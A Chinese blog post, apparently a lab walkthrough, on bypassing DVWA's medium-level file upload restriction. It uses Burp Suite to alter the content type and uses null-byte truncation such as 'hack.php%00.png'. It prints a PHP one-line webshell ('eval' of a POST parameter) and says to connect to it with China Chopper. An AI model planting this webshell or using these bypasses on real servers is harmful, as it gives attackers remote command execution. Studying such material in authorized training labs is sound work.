dvwa之 file upload (medium)一句话木马、burpsuit、中国菜刀

本文介绍在特定环境下如何绕过Medium级别的文件上传限制,包括利用Burp Suite修改上传包、利用%00截断绕过Magic_quote_gpc限制及通过Hex修改文件上传名等多种方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Medium级:

由此可以看到,medium中,限定了文件的上传类型,只允许JPEG或者是png格式的文件,直接上传php文件会显示失败,所以这个时候需要使用burpsuit进行修改包。(法1)

将文件修改为pass.png,直接点击上传,然后修改burpsuit中数据

然后显示上传成功,直接使用中国菜刀进行连接即可。


    法二

在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时(其实不止是这个函数,还有很多),可以在文件名中使用%00截断,所以可以把上传文件命名为hack.php%00.png。如果Magic_quote_gpc函数打开的时候,所有的' " \ NULL 等都会被加上一个反斜线进行转义

可以看到,包中的文件类型为image/png,可以通过文件类型检查。


这个时候直接上传可有:



上传成功。

1.png

直接进行连接即可!

法3:使用burpsuit    00截断:

命名文件为:


然后使用burpsuit进行拦截,改包


在hex中将2e修改为00,然后查看下:


这个时候直接进行上传即可。


显示上传成功。





部分资料来自于互联网(自己的笔记整理,中间有些不是很详细,请自行百度)







### DVWA 文件上传 句话木马实现方法 在DVWA (Damn Vulnerable Web Application) 的`File Upload`模块中,可以研究不同安全级别下的文件上传机制以及可能存在的漏洞。对于低级别的设置,几乎没有任何防护措施,在这种情况下可以直接尝试上传包含恶意代码的文件。 #### 准备工作 为了执行此操作,需准备个简单的PHP句话木马脚本。该脚本通常非常短小精悍,能够接收来自外部请求并执行相应的命令。例如: ```php <?php @eval($_POST['cmd']);?> ``` 这段代码允许通过HTTP POST请求传递名为`cmd`的数据,并对其进行评估和执行[^1]。 #### 使用Burp Suite进行中间人攻击 当目标环境配置为较低的安全等级时,可借助工具如Burp Suite来进行更深入的操作。启动应用程序后,选择要上传的`.php`文件作为所谓的“句话木马”,并通过浏览器提交表单。此时,Burp Suite将拦截到这次请求,使得修改成为可能[^3]。 如果服务器端有特定类型的验证(比如只接受图像),则可以在保持原始MIME类型的同时更改实际的内容,即伪装成合法图片但实际上包含了PHP代码。这可以通过编辑被截获的数据包来完成——保留原有的文件头信息不变,而替换掉主体部分为上述提到的句话木马代码。 #### 测试效果 旦成功上传句话木马至服务器上指定位置,则可通过专门设计用于连接此类后门程序的应用程序(例如中国菜刀)发起控制指令。这些客户端应用能帮助构建与远程主机之间的交互界面,从而进步探索潜在风险或实施其他形式的安全测试活动[^2]。 需要注意的是,以上描述仅适用于授权范围内的渗透测试练习;未经授权擅自访问他人计算机信息系统属于违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值